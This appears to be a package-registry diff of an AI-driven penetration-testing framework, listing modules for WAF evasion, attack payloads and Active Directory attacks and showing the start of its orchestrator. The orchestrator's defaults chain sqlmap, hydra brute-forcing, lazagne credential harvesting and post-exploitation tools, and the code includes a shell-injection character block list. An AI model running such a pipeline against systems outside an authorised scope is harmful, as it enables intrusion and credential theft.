aiptx 2.0.2__py3-none-any.whl
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of aiptx might be problematic. Click here for more details.
- aipt_v2/__init__.py +110 -0
- aipt_v2/__main__.py +24 -0
- aipt_v2/agents/AIPTxAgent/__init__.py +10 -0
- aipt_v2/agents/AIPTxAgent/aiptx_agent.py +211 -0
- aipt_v2/agents/__init__.py +24 -0
- aipt_v2/agents/base.py +520 -0
- aipt_v2/agents/ptt.py +406 -0
- aipt_v2/agents/state.py +168 -0
- aipt_v2/app.py +960 -0
- aipt_v2/browser/__init__.py +31 -0
- aipt_v2/browser/automation.py +458 -0
- aipt_v2/browser/crawler.py +453 -0
- aipt_v2/cli.py +321 -0
- aipt_v2/compliance/__init__.py +71 -0
- aipt_v2/compliance/compliance_report.py +449 -0
- aipt_v2/compliance/framework_mapper.py +424 -0
- aipt_v2/compliance/nist_mapping.py +345 -0
- aipt_v2/compliance/owasp_mapping.py +330 -0
- aipt_v2/compliance/pci_mapping.py +297 -0
- aipt_v2/config.py +288 -0
- aipt_v2/core/__init__.py +43 -0
- aipt_v2/core/agent.py +630 -0
- aipt_v2/core/llm.py +395 -0
- aipt_v2/core/memory.py +305 -0
- aipt_v2/core/ptt.py +329 -0
- aipt_v2/database/__init__.py +14 -0
- aipt_v2/database/models.py +232 -0
- aipt_v2/database/repository.py +384 -0
- aipt_v2/docker/__init__.py +23 -0
- aipt_v2/docker/builder.py +260 -0
- aipt_v2/docker/manager.py +222 -0
- aipt_v2/docker/sandbox.py +371 -0
- aipt_v2/evasion/__init__.py +58 -0
- aipt_v2/evasion/request_obfuscator.py +272 -0
- aipt_v2/evasion/tls_fingerprint.py +285 -0
- aipt_v2/evasion/ua_rotator.py +301 -0
- aipt_v2/evasion/waf_bypass.py +439 -0
- aipt_v2/execution/__init__.py +23 -0
- aipt_v2/execution/executor.py +302 -0
- aipt_v2/execution/parser.py +544 -0
- aipt_v2/execution/terminal.py +337 -0
- aipt_v2/health.py +437 -0
- aipt_v2/intelligence/__init__.py +85 -0
- aipt_v2/intelligence/auth.py +520 -0
- aipt_v2/intelligence/chaining.py +775 -0
- aipt_v2/intelligence/cve_aipt.py +334 -0
- aipt_v2/intelligence/cve_info.py +1111 -0
- aipt_v2/intelligence/rag.py +239 -0
- aipt_v2/intelligence/scope.py +442 -0
- aipt_v2/intelligence/searchers/__init__.py +5 -0
- aipt_v2/intelligence/searchers/exploitdb_searcher.py +523 -0
- aipt_v2/intelligence/searchers/github_searcher.py +467 -0
- aipt_v2/intelligence/searchers/google_searcher.py +281 -0
- aipt_v2/intelligence/tools.json +443 -0
- aipt_v2/intelligence/triage.py +670 -0
- aipt_v2/interface/__init__.py +5 -0
- aipt_v2/interface/cli.py +230 -0
- aipt_v2/interface/main.py +501 -0
- aipt_v2/interface/tui.py +1276 -0
- aipt_v2/interface/utils.py +583 -0
- aipt_v2/llm/__init__.py +39 -0
- aipt_v2/llm/config.py +26 -0
- aipt_v2/llm/llm.py +514 -0
- aipt_v2/llm/memory.py +214 -0
- aipt_v2/llm/request_queue.py +89 -0
- aipt_v2/llm/utils.py +89 -0
- aipt_v2/models/__init__.py +15 -0
- aipt_v2/models/findings.py +295 -0
- aipt_v2/models/phase_result.py +224 -0
- aipt_v2/models/scan_config.py +207 -0
- aipt_v2/monitoring/grafana/dashboards/aipt-dashboard.json +355 -0
- aipt_v2/monitoring/grafana/dashboards/default.yml +17 -0
- aipt_v2/monitoring/grafana/datasources/prometheus.yml +17 -0
- aipt_v2/monitoring/prometheus.yml +60 -0
- aipt_v2/orchestration/__init__.py +52 -0
- aipt_v2/orchestration/pipeline.py +398 -0
- aipt_v2/orchestration/progress.py +300 -0
- aipt_v2/orchestration/scheduler.py +296 -0
- aipt_v2/orchestrator.py +2284 -0
- aipt_v2/payloads/__init__.py +27 -0
- aipt_v2/payloads/cmdi.py +150 -0
- aipt_v2/payloads/sqli.py +263 -0
- aipt_v2/payloads/ssrf.py +204 -0
- aipt_v2/payloads/templates.py +222 -0
- aipt_v2/payloads/traversal.py +166 -0
- aipt_v2/payloads/xss.py +204 -0
- aipt_v2/prompts/__init__.py +60 -0
- aipt_v2/proxy/__init__.py +29 -0
- aipt_v2/proxy/history.py +352 -0
- aipt_v2/proxy/interceptor.py +452 -0
- aipt_v2/recon/__init__.py +44 -0
- aipt_v2/recon/dns.py +241 -0
- aipt_v2/recon/osint.py +367 -0
- aipt_v2/recon/subdomain.py +372 -0
- aipt_v2/recon/tech_detect.py +311 -0
- aipt_v2/reports/__init__.py +17 -0
- aipt_v2/reports/generator.py +313 -0
- aipt_v2/reports/html_report.py +378 -0
- aipt_v2/runtime/__init__.py +44 -0
- aipt_v2/runtime/base.py +30 -0
- aipt_v2/runtime/docker.py +401 -0
- aipt_v2/runtime/local.py +346 -0
- aipt_v2/runtime/tool_server.py +205 -0
- aipt_v2/scanners/__init__.py +28 -0
- aipt_v2/scanners/base.py +273 -0
- aipt_v2/scanners/nikto.py +244 -0
- aipt_v2/scanners/nmap.py +402 -0
- aipt_v2/scanners/nuclei.py +273 -0
- aipt_v2/scanners/web.py +454 -0
- aipt_v2/scripts/security_audit.py +366 -0
- aipt_v2/telemetry/__init__.py +7 -0
- aipt_v2/telemetry/tracer.py +347 -0
- aipt_v2/terminal/__init__.py +28 -0
- aipt_v2/terminal/executor.py +400 -0
- aipt_v2/terminal/sandbox.py +350 -0
- aipt_v2/tools/__init__.py +44 -0
- aipt_v2/tools/active_directory/__init__.py +78 -0
- aipt_v2/tools/active_directory/ad_config.py +238 -0
- aipt_v2/tools/active_directory/bloodhound_wrapper.py +447 -0
- aipt_v2/tools/active_directory/kerberos_attacks.py +430 -0
- aipt_v2/tools/active_directory/ldap_enum.py +533 -0
- aipt_v2/tools/active_directory/smb_attacks.py +505 -0
- aipt_v2/tools/agents_graph/__init__.py +19 -0
- aipt_v2/tools/agents_graph/agents_graph_actions.py +69 -0
- aipt_v2/tools/api_security/__init__.py +76 -0
- aipt_v2/tools/api_security/api_discovery.py +608 -0
- aipt_v2/tools/api_security/graphql_scanner.py +622 -0
- aipt_v2/tools/api_security/jwt_analyzer.py +577 -0
- aipt_v2/tools/api_security/openapi_fuzzer.py +761 -0
- aipt_v2/tools/browser/__init__.py +5 -0
- aipt_v2/tools/browser/browser_actions.py +238 -0
- aipt_v2/tools/browser/browser_instance.py +535 -0
- aipt_v2/tools/browser/tab_manager.py +344 -0
- aipt_v2/tools/cloud/__init__.py +70 -0
- aipt_v2/tools/cloud/cloud_config.py +273 -0
- aipt_v2/tools/cloud/cloud_scanner.py +639 -0
- aipt_v2/tools/cloud/prowler_tool.py +571 -0
- aipt_v2/tools/cloud/scoutsuite_tool.py +359 -0
- aipt_v2/tools/executor.py +307 -0
- aipt_v2/tools/parser.py +408 -0
- aipt_v2/tools/proxy/__init__.py +5 -0
- aipt_v2/tools/proxy/proxy_actions.py +103 -0
- aipt_v2/tools/proxy/proxy_manager.py +789 -0
- aipt_v2/tools/registry.py +196 -0
- aipt_v2/tools/scanners/__init__.py +343 -0
- aipt_v2/tools/scanners/acunetix_tool.py +712 -0
- aipt_v2/tools/scanners/burp_tool.py +631 -0
- aipt_v2/tools/scanners/config.py +156 -0
- aipt_v2/tools/scanners/nessus_tool.py +588 -0
- aipt_v2/tools/scanners/zap_tool.py +612 -0
- aipt_v2/tools/terminal/__init__.py +5 -0
- aipt_v2/tools/terminal/terminal_actions.py +37 -0
- aipt_v2/tools/terminal/terminal_manager.py +153 -0
- aipt_v2/tools/terminal/terminal_session.py +449 -0
- aipt_v2/tools/tool_processing.py +108 -0
- aipt_v2/utils/__init__.py +17 -0
- aipt_v2/utils/logging.py +201 -0
- aipt_v2/utils/model_manager.py +187 -0
- aipt_v2/utils/searchers/__init__.py +269 -0
- aiptx-2.0.2.dist-info/METADATA +324 -0
- aiptx-2.0.2.dist-info/RECORD +165 -0
- aiptx-2.0.2.dist-info/WHEEL +5 -0
- aiptx-2.0.2.dist-info/entry_points.txt +7 -0
- aiptx-2.0.2.dist-info/licenses/LICENSE +21 -0
- aiptx-2.0.2.dist-info/top_level.txt +1 -0
aipt_v2/orchestrator.py
ADDED
|
@@ -0,0 +1,2284 @@
|
|
|
1
|
+
#!/usr/bin/env python3
|
|
2
|
+
"""
|
|
3
|
+
AIPT Orchestrator - Full Penetration Testing Pipeline
|
|
4
|
+
=====================================================
|
|
5
|
+
|
|
6
|
+
Orchestrates the complete pentest workflow:
|
|
7
|
+
RECON → SCAN → EXPLOIT → REPORT
|
|
8
|
+
|
|
9
|
+
Each phase uses specialized tools and integrates with enterprise scanners
|
|
10
|
+
(Acunetix, Burp Suite) for comprehensive coverage.
|
|
11
|
+
|
|
12
|
+
Usage:
|
|
13
|
+
from orchestrator import Orchestrator
|
|
14
|
+
|
|
15
|
+
orch = Orchestrator("example.com")
|
|
16
|
+
results = await orch.run()
|
|
17
|
+
|
|
18
|
+
Or via CLI:
|
|
19
|
+
python -m aipt_v2.orchestrator example.com --output ./results
|
|
20
|
+
"""
|
|
21
|
+
|
|
22
|
+
import asyncio
|
|
23
|
+
import json
|
|
24
|
+
import logging
|
|
25
|
+
import os
|
|
26
|
+
import re
|
|
27
|
+
import shlex
|
|
28
|
+
import subprocess
|
|
29
|
+
import time
|
|
30
|
+
from dataclasses import dataclass, field
|
|
31
|
+
from datetime import datetime, timezone
|
|
32
|
+
from enum import Enum
|
|
33
|
+
from pathlib import Path
|
|
34
|
+
from typing import Any, Callable, Dict, List, Optional
|
|
35
|
+
|
|
36
|
+
# Scanner integrations
|
|
37
|
+
from aipt_v2.tools.scanners import (
|
|
38
|
+
AcunetixTool,
|
|
39
|
+
AcunetixConfig,
|
|
40
|
+
ScanProfile,
|
|
41
|
+
BurpTool,
|
|
42
|
+
BurpConfig,
|
|
43
|
+
get_acunetix,
|
|
44
|
+
get_burp,
|
|
45
|
+
acunetix_scan,
|
|
46
|
+
acunetix_vulns,
|
|
47
|
+
test_all_connections,
|
|
48
|
+
)
|
|
49
|
+
|
|
50
|
+
# Intelligence module - Advanced analysis capabilities
|
|
51
|
+
from aipt_v2.intelligence import (
|
|
52
|
+
# Vulnerability Chaining - Connect related findings into attack paths
|
|
53
|
+
VulnerabilityChainer,
|
|
54
|
+
AttackChain,
|
|
55
|
+
# AI-Powered Triage - Prioritize by real-world impact
|
|
56
|
+
AITriage,
|
|
57
|
+
TriageResult,
|
|
58
|
+
# Scope Enforcement - Stay within authorization
|
|
59
|
+
ScopeEnforcer,
|
|
60
|
+
ScopeConfig,
|
|
61
|
+
ScopeDecision,
|
|
62
|
+
create_scope_from_target,
|
|
63
|
+
# Authentication - Test protected resources
|
|
64
|
+
AuthenticationManager,
|
|
65
|
+
AuthCredentials,
|
|
66
|
+
AuthMethod,
|
|
67
|
+
)
|
|
68
|
+
|
|
69
|
+
logger = logging.getLogger(__name__)
|
|
70
|
+
|
|
71
|
+
|
|
72
|
+
# ==================== SECURITY: Input Validation ====================
|
|
73
|
+
|
|
74
|
+
# Domain validation pattern (RFC 1123 compliant)
|
|
75
|
+
# Allows: alphanumeric, hyphens (not at start/end), dots for subdomains
|
|
76
|
+
DOMAIN_PATTERN = re.compile(
|
|
77
|
+
r'^(?!-)' # Cannot start with hyphen
|
|
78
|
+
r'(?:[a-zA-Z0-9]' # Start with alphanumeric
|
|
79
|
+
r'(?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?' # Middle can have hyphens
|
|
80
|
+
r'\.)*' # Subdomains separated by dots
|
|
81
|
+
r'[a-zA-Z0-9]' # Domain start
|
|
82
|
+
r'(?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?' # Domain middle
|
|
83
|
+
r'\.[a-zA-Z]{2,}$' # TLD (at least 2 chars)
|
|
84
|
+
)
|
|
85
|
+
|
|
86
|
+
# IP address pattern (IPv4)
|
|
87
|
+
IPV4_PATTERN = re.compile(
|
|
88
|
+
r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
|
|
89
|
+
r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
|
|
90
|
+
)
|
|
91
|
+
|
|
92
|
+
# Characters that are dangerous in shell commands
|
|
93
|
+
SHELL_DANGEROUS_CHARS = set(';|&$`\n\r\\\'\"(){}[]<>!')
|
|
94
|
+
|
|
95
|
+
|
|
96
|
+
def validate_domain(domain: str) -> str:
|
|
97
|
+
"""
|
|
98
|
+
Validate domain format to prevent command injection (CWE-78).
|
|
99
|
+
|
|
100
|
+
Args:
|
|
101
|
+
domain: Domain string to validate
|
|
102
|
+
|
|
103
|
+
Returns:
|
|
104
|
+
Validated domain string
|
|
105
|
+
|
|
106
|
+
Raises:
|
|
107
|
+
ValueError: If domain format is invalid or contains dangerous characters
|
|
108
|
+
"""
|
|
109
|
+
if not domain:
|
|
110
|
+
raise ValueError("Domain cannot be empty")
|
|
111
|
+
|
|
112
|
+
domain = domain.strip().lower()
|
|
113
|
+
|
|
114
|
+
# Check length
|
|
115
|
+
if len(domain) > 253:
|
|
116
|
+
raise ValueError(f"Domain too long: {len(domain)} chars (max 253)")
|
|
117
|
+
|
|
118
|
+
# Check for dangerous shell characters
|
|
119
|
+
dangerous_found = set(domain) & SHELL_DANGEROUS_CHARS
|
|
120
|
+
if dangerous_found:
|
|
121
|
+
raise ValueError(
|
|
122
|
+
f"Domain contains dangerous characters: {dangerous_found}. "
|
|
123
|
+
"Possible command injection attempt."
|
|
124
|
+
)
|
|
125
|
+
|
|
126
|
+
# Validate as IP or domain
|
|
127
|
+
if IPV4_PATTERN.match(domain):
|
|
128
|
+
return domain
|
|
129
|
+
|
|
130
|
+
if DOMAIN_PATTERN.match(domain):
|
|
131
|
+
return domain
|
|
132
|
+
|
|
133
|
+
raise ValueError(
|
|
134
|
+
f"Invalid domain format: {domain}. "
|
|
135
|
+
"Expected format: example.com or sub.example.com"
|
|
136
|
+
)
|
|
137
|
+
|
|
138
|
+
|
|
139
|
+
def sanitize_for_shell(value: str) -> str:
|
|
140
|
+
"""
|
|
141
|
+
Sanitize a value for safe use in shell commands using shlex.quote.
|
|
142
|
+
|
|
143
|
+
Args:
|
|
144
|
+
value: String to sanitize
|
|
145
|
+
|
|
146
|
+
Returns:
|
|
147
|
+
Shell-escaped string safe for command interpolation
|
|
148
|
+
"""
|
|
149
|
+
return shlex.quote(value)
|
|
150
|
+
|
|
151
|
+
|
|
152
|
+
class Phase(Enum):
|
|
153
|
+
"""Pentest phases."""
|
|
154
|
+
RECON = "recon"
|
|
155
|
+
SCAN = "scan"
|
|
156
|
+
ANALYZE = "analyze" # Intelligence analysis (chaining, triage)
|
|
157
|
+
EXPLOIT = "exploit"
|
|
158
|
+
POST_EXPLOIT = "post_exploit" # Privilege escalation & lateral movement
|
|
159
|
+
REPORT = "report"
|
|
160
|
+
|
|
161
|
+
|
|
162
|
+
class Severity(Enum):
|
|
163
|
+
"""Finding severity levels."""
|
|
164
|
+
CRITICAL = "critical"
|
|
165
|
+
HIGH = "high"
|
|
166
|
+
MEDIUM = "medium"
|
|
167
|
+
LOW = "low"
|
|
168
|
+
INFO = "info"
|
|
169
|
+
|
|
170
|
+
|
|
171
|
+
@dataclass
|
|
172
|
+
class Finding:
|
|
173
|
+
"""Security finding from any tool."""
|
|
174
|
+
type: str
|
|
175
|
+
value: str
|
|
176
|
+
description: str
|
|
177
|
+
severity: str
|
|
178
|
+
phase: str
|
|
179
|
+
tool: str
|
|
180
|
+
target: str = ""
|
|
181
|
+
evidence: str = ""
|
|
182
|
+
remediation: str = ""
|
|
183
|
+
metadata: Dict[str, Any] = field(default_factory=dict)
|
|
184
|
+
timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
|
|
185
|
+
|
|
186
|
+
|
|
187
|
+
@dataclass
|
|
188
|
+
class PhaseResult:
|
|
189
|
+
"""Result of a phase execution."""
|
|
190
|
+
phase: Phase
|
|
191
|
+
status: str
|
|
192
|
+
started_at: str
|
|
193
|
+
finished_at: str
|
|
194
|
+
duration: float
|
|
195
|
+
findings: List[Finding]
|
|
196
|
+
tools_run: List[str]
|
|
197
|
+
errors: List[str] = field(default_factory=list)
|
|
198
|
+
metadata: Dict[str, Any] = field(default_factory=dict)
|
|
199
|
+
|
|
200
|
+
|
|
201
|
+
@dataclass
|
|
202
|
+
class OrchestratorConfig:
|
|
203
|
+
"""Configuration for the orchestrator."""
|
|
204
|
+
# Target
|
|
205
|
+
target: str
|
|
206
|
+
output_dir: str = "./scan_results"
|
|
207
|
+
|
|
208
|
+
# Scan mode
|
|
209
|
+
full_mode: bool = False # Enable all tools including exploitation
|
|
210
|
+
|
|
211
|
+
# Phase control
|
|
212
|
+
skip_recon: bool = False
|
|
213
|
+
skip_scan: bool = False
|
|
214
|
+
skip_exploit: bool = False
|
|
215
|
+
skip_post_exploit: bool = True # Disabled by default, auto-enables on shell access
|
|
216
|
+
skip_report: bool = False
|
|
217
|
+
|
|
218
|
+
# Recon settings - ENHANCED with 10 tools
|
|
219
|
+
recon_tools: List[str] = field(default_factory=lambda: [
|
|
220
|
+
"subfinder", "assetfinder", "amass", "httpx", "nmap",
|
|
221
|
+
"waybackurls", "theHarvester", "dnsrecon", "wafw00f", "whatweb"
|
|
222
|
+
])
|
|
223
|
+
|
|
224
|
+
# Scan settings - ENHANCED with 8 tools
|
|
225
|
+
scan_tools: List[str] = field(default_factory=lambda: [
|
|
226
|
+
"nuclei", "ffuf", "sslscan", "nikto", "wpscan",
|
|
227
|
+
"testssl", "gobuster", "dirsearch"
|
|
228
|
+
])
|
|
229
|
+
|
|
230
|
+
# Exploit settings - NEW exploitation tools (enabled in full_mode)
|
|
231
|
+
exploit_tools: List[str] = field(default_factory=lambda: [
|
|
232
|
+
"sqlmap", "commix", "xsstrike", "hydra", "searchsploit"
|
|
233
|
+
])
|
|
234
|
+
|
|
235
|
+
# Post-exploit settings - NEW privilege escalation tools
|
|
236
|
+
post_exploit_tools: List[str] = field(default_factory=lambda: [
|
|
237
|
+
"linpeas", "winpeas", "pspy", "lazagne"
|
|
238
|
+
])
|
|
239
|
+
|
|
240
|
+
# Enterprise scanners
|
|
241
|
+
use_acunetix: bool = True
|
|
242
|
+
use_burp: bool = False
|
|
243
|
+
use_nessus: bool = False # NEW
|
|
244
|
+
use_zap: bool = False # NEW
|
|
245
|
+
acunetix_profile: str = "full"
|
|
246
|
+
wait_for_scanners: bool = False
|
|
247
|
+
scanner_timeout: int = 3600
|
|
248
|
+
|
|
249
|
+
# Exploit settings
|
|
250
|
+
validate_findings: bool = True
|
|
251
|
+
check_sensitive_paths: bool = True
|
|
252
|
+
enable_exploitation: bool = False # Requires explicit opt-in or full_mode
|
|
253
|
+
|
|
254
|
+
# SQLMap settings
|
|
255
|
+
sqlmap_level: int = 2
|
|
256
|
+
sqlmap_risk: int = 2
|
|
257
|
+
sqlmap_timeout: int = 600
|
|
258
|
+
|
|
259
|
+
# Hydra settings
|
|
260
|
+
hydra_threads: int = 4
|
|
261
|
+
hydra_timeout: int = 300
|
|
262
|
+
wordlist_users: str = "/usr/share/wordlists/metasploit/unix_users.txt"
|
|
263
|
+
wordlist_passwords: str = "/usr/share/wordlists/rockyou.txt"
|
|
264
|
+
|
|
265
|
+
# Container/DevSecOps settings
|
|
266
|
+
enable_container_scan: bool = False
|
|
267
|
+
enable_secret_detection: bool = False
|
|
268
|
+
trivy_severity: str = "HIGH,CRITICAL"
|
|
269
|
+
|
|
270
|
+
# Report settings
|
|
271
|
+
report_format: str = "html"
|
|
272
|
+
report_template: str = "professional"
|
|
273
|
+
|
|
274
|
+
# Shell access tracking (set during exploitation)
|
|
275
|
+
shell_obtained: bool = False
|
|
276
|
+
target_os: str = "" # "linux", "windows", or ""
|
|
277
|
+
|
|
278
|
+
# Intelligence module settings
|
|
279
|
+
enable_intelligence: bool = True # Enable chaining and triage
|
|
280
|
+
scope_config: Optional[ScopeConfig] = None # Authorization boundary
|
|
281
|
+
auth_credentials: Optional[AuthCredentials] = None # Authentication for protected resources
|
|
282
|
+
|
|
283
|
+
|
|
284
|
+
class Orchestrator:
|
|
285
|
+
"""
|
|
286
|
+
AIPT Orchestrator - Full pentest pipeline controller.
|
|
287
|
+
|
|
288
|
+
Coordinates reconnaissance, scanning, exploitation, and reporting
|
|
289
|
+
phases with integrated support for enterprise scanners.
|
|
290
|
+
"""
|
|
291
|
+
|
|
292
|
+
def __init__(self, target: str, config: Optional[OrchestratorConfig] = None):
|
|
293
|
+
"""
|
|
294
|
+
Initialize the orchestrator.
|
|
295
|
+
|
|
296
|
+
Args:
|
|
297
|
+
target: Target domain or URL
|
|
298
|
+
config: Optional configuration
|
|
299
|
+
"""
|
|
300
|
+
self.target = self._normalize_target(target)
|
|
301
|
+
self.domain = self._extract_domain(target)
|
|
302
|
+
self.config = config or OrchestratorConfig(target=target)
|
|
303
|
+
self.config.target = self.target
|
|
304
|
+
|
|
305
|
+
# State
|
|
306
|
+
self.findings: List[Finding] = []
|
|
307
|
+
self.phase_results: Dict[Phase, PhaseResult] = {}
|
|
308
|
+
self.subdomains: List[str] = []
|
|
309
|
+
self.live_hosts: List[str] = []
|
|
310
|
+
self.scan_ids: Dict[str, str] = {} # Scanner -> scan_id mapping
|
|
311
|
+
|
|
312
|
+
# Setup output directory
|
|
313
|
+
self.timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
|
314
|
+
self.output_dir = Path(self.config.output_dir) / f"{self.domain}_scan_{self.timestamp}"
|
|
315
|
+
self.output_dir.mkdir(parents=True, exist_ok=True)
|
|
316
|
+
|
|
317
|
+
# Callbacks
|
|
318
|
+
self.on_phase_start: Optional[Callable[[Phase], None]] = None
|
|
319
|
+
self.on_phase_complete: Optional[Callable[[PhaseResult], None]] = None
|
|
320
|
+
self.on_finding: Optional[Callable[[Finding], None]] = None
|
|
321
|
+
self.on_tool_start: Optional[Callable[[str, str], None]] = None
|
|
322
|
+
self.on_tool_complete: Optional[Callable[[str, str, Any], None]] = None
|
|
323
|
+
self.on_chain_discovered: Optional[Callable[[AttackChain], None]] = None
|
|
324
|
+
|
|
325
|
+
# =====================================================================
|
|
326
|
+
# Intelligence Module Components
|
|
327
|
+
# =====================================================================
|
|
328
|
+
if self.config.enable_intelligence:
|
|
329
|
+
# Scope Enforcement - Ensure testing stays within authorization
|
|
330
|
+
if self.config.scope_config:
|
|
331
|
+
self._scope_enforcer = ScopeEnforcer(self.config.scope_config)
|
|
332
|
+
issues = self._scope_enforcer.validate_scope_config()
|
|
333
|
+
for issue in issues:
|
|
334
|
+
logger.warning(f"Scope config: {issue}")
|
|
335
|
+
else:
|
|
336
|
+
self._scope_enforcer = ScopeEnforcer(create_scope_from_target(self.target))
|
|
337
|
+
|
|
338
|
+
# Vulnerability Chainer - Connect related findings
|
|
339
|
+
self._vuln_chainer = VulnerabilityChainer()
|
|
340
|
+
|
|
341
|
+
# AI Triage - Prioritize findings by real-world impact
|
|
342
|
+
self._ai_triage = AITriage()
|
|
343
|
+
|
|
344
|
+
# Authentication Manager
|
|
345
|
+
self._auth_manager: Optional[AuthenticationManager] = None
|
|
346
|
+
if self.config.auth_credentials and self.config.auth_credentials.method != AuthMethod.NONE:
|
|
347
|
+
self._auth_manager = AuthenticationManager(self.config.auth_credentials)
|
|
348
|
+
logger.info(f"Authentication configured: {self.config.auth_credentials.method.value}")
|
|
349
|
+
|
|
350
|
+
# Analysis results storage
|
|
351
|
+
self.attack_chains: List[AttackChain] = []
|
|
352
|
+
self.triage_result: Optional[TriageResult] = None
|
|
353
|
+
else:
|
|
354
|
+
self._scope_enforcer = None
|
|
355
|
+
self._vuln_chainer = None
|
|
356
|
+
self._ai_triage = None
|
|
357
|
+
self._auth_manager = None
|
|
358
|
+
self.attack_chains = []
|
|
359
|
+
self.triage_result = None
|
|
360
|
+
|
|
361
|
+
logger.info(f"Orchestrator initialized for {self.domain}")
|
|
362
|
+
logger.info(f"Output directory: {self.output_dir}")
|
|
363
|
+
if self.config.enable_intelligence:
|
|
364
|
+
logger.info("Intelligence module enabled (chaining, triage, scope)")
|
|
365
|
+
|
|
366
|
+
@staticmethod
|
|
367
|
+
def _normalize_target(target: str) -> str:
|
|
368
|
+
"""Normalize target URL."""
|
|
369
|
+
if not target.startswith(("http://", "https://")):
|
|
370
|
+
return f"https://{target}"
|
|
371
|
+
return target
|
|
372
|
+
|
|
373
|
+
@staticmethod
|
|
374
|
+
def _extract_domain(target: str) -> str:
|
|
375
|
+
"""
|
|
376
|
+
Extract and validate domain from target.
|
|
377
|
+
|
|
378
|
+
Security: Validates domain format to prevent command injection (CWE-78).
|
|
379
|
+
"""
|
|
380
|
+
domain = target.replace("https://", "").replace("http://", "")
|
|
381
|
+
domain = domain.split("/")[0]
|
|
382
|
+
domain = domain.split(":")[0]
|
|
383
|
+
|
|
384
|
+
# Security: Validate domain format
|
|
385
|
+
return validate_domain(domain)
|
|
386
|
+
|
|
387
|
+
@property
|
|
388
|
+
def safe_domain(self) -> str:
|
|
389
|
+
"""
|
|
390
|
+
Get shell-safe domain for command interpolation.
|
|
391
|
+
|
|
392
|
+
Returns:
|
|
393
|
+
Shell-escaped domain string
|
|
394
|
+
"""
|
|
395
|
+
return sanitize_for_shell(self.domain)
|
|
396
|
+
|
|
397
|
+
def _log_phase(self, phase: Phase, message: str):
|
|
398
|
+
"""Log a phase message."""
|
|
399
|
+
print(f"\n{'='*60}")
|
|
400
|
+
print(f" [{phase.value.upper()}] {message}")
|
|
401
|
+
print(f"{'='*60}\n")
|
|
402
|
+
|
|
403
|
+
def _log_tool(self, tool: str, status: str = "running"):
|
|
404
|
+
"""Log tool execution."""
|
|
405
|
+
icon = "◉" if status == "running" else "✓" if status == "done" else "✗"
|
|
406
|
+
print(f" [{icon}] {tool}")
|
|
407
|
+
|
|
408
|
+
async def _run_command(self, cmd: str, timeout: int = 300) -> tuple[int, str]:
|
|
409
|
+
"""Run a shell command asynchronously."""
|
|
410
|
+
try:
|
|
411
|
+
proc = await asyncio.create_subprocess_shell(
|
|
412
|
+
cmd,
|
|
413
|
+
stdout=asyncio.subprocess.PIPE,
|
|
414
|
+
stderr=asyncio.subprocess.PIPE
|
|
415
|
+
)
|
|
416
|
+
stdout, stderr = await asyncio.wait_for(
|
|
417
|
+
proc.communicate(),
|
|
418
|
+
timeout=timeout
|
|
419
|
+
)
|
|
420
|
+
output = (stdout.decode() if stdout else "") + (stderr.decode() if stderr else "")
|
|
421
|
+
return proc.returncode or 0, output
|
|
422
|
+
except asyncio.TimeoutError:
|
|
423
|
+
return -1, f"Command timed out after {timeout}s"
|
|
424
|
+
except Exception as e:
|
|
425
|
+
return -1, str(e)
|
|
426
|
+
|
|
427
|
+
def _add_finding(self, finding: Finding):
|
|
428
|
+
"""Add a finding and trigger callback."""
|
|
429
|
+
self.findings.append(finding)
|
|
430
|
+
if self.on_finding:
|
|
431
|
+
self.on_finding(finding)
|
|
432
|
+
|
|
433
|
+
# ==================== RECON PHASE ====================
|
|
434
|
+
|
|
435
|
+
async def run_recon(self) -> PhaseResult:
|
|
436
|
+
"""Execute reconnaissance phase."""
|
|
437
|
+
phase = Phase.RECON
|
|
438
|
+
started_at = datetime.now(timezone.utc).isoformat()
|
|
439
|
+
start_time = time.time()
|
|
440
|
+
findings = []
|
|
441
|
+
tools_run = []
|
|
442
|
+
errors = []
|
|
443
|
+
|
|
444
|
+
if self.on_phase_start:
|
|
445
|
+
self.on_phase_start(phase)
|
|
446
|
+
|
|
447
|
+
self._log_phase(phase, f"Reconnaissance on {self.domain}")
|
|
448
|
+
|
|
449
|
+
# 1. Subdomain Enumeration
|
|
450
|
+
self._log_tool("Subdomain Enumeration")
|
|
451
|
+
|
|
452
|
+
# Subfinder
|
|
453
|
+
if "subfinder" in self.config.recon_tools:
|
|
454
|
+
self._log_tool("subfinder", "running")
|
|
455
|
+
# Security: Use safe_domain to prevent command injection
|
|
456
|
+
ret, output = await self._run_command(
|
|
457
|
+
f"subfinder -d {self.safe_domain} -silent 2>/dev/null"
|
|
458
|
+
)
|
|
459
|
+
if ret == 0:
|
|
460
|
+
subs = [s.strip() for s in output.split("\n") if s.strip()]
|
|
461
|
+
self.subdomains.extend(subs)
|
|
462
|
+
(self.output_dir / f"subfinder_{self.domain}.txt").write_text(output)
|
|
463
|
+
tools_run.append("subfinder")
|
|
464
|
+
self._log_tool(f"subfinder - {len(subs)} subdomains", "done")
|
|
465
|
+
|
|
466
|
+
# Assetfinder
|
|
467
|
+
if "assetfinder" in self.config.recon_tools:
|
|
468
|
+
self._log_tool("assetfinder", "running")
|
|
469
|
+
# Security: Use safe_domain to prevent command injection
|
|
470
|
+
ret, output = await self._run_command(
|
|
471
|
+
f"assetfinder --subs-only {self.safe_domain} 2>/dev/null"
|
|
472
|
+
)
|
|
473
|
+
if ret == 0:
|
|
474
|
+
subs = [s.strip() for s in output.split("\n") if s.strip()]
|
|
475
|
+
self.subdomains.extend(subs)
|
|
476
|
+
(self.output_dir / f"assetfinder_{self.domain}.txt").write_text(output)
|
|
477
|
+
tools_run.append("assetfinder")
|
|
478
|
+
self._log_tool(f"assetfinder - {len(subs)} assets", "done")
|
|
479
|
+
|
|
480
|
+
# Deduplicate subdomains
|
|
481
|
+
self.subdomains = list(set(self.subdomains))
|
|
482
|
+
all_subs_file = self.output_dir / f"all_subs_{self.domain}.txt"
|
|
483
|
+
all_subs_file.write_text("\n".join(self.subdomains))
|
|
484
|
+
|
|
485
|
+
findings.append(Finding(
|
|
486
|
+
type="subdomain_count",
|
|
487
|
+
value=str(len(self.subdomains)),
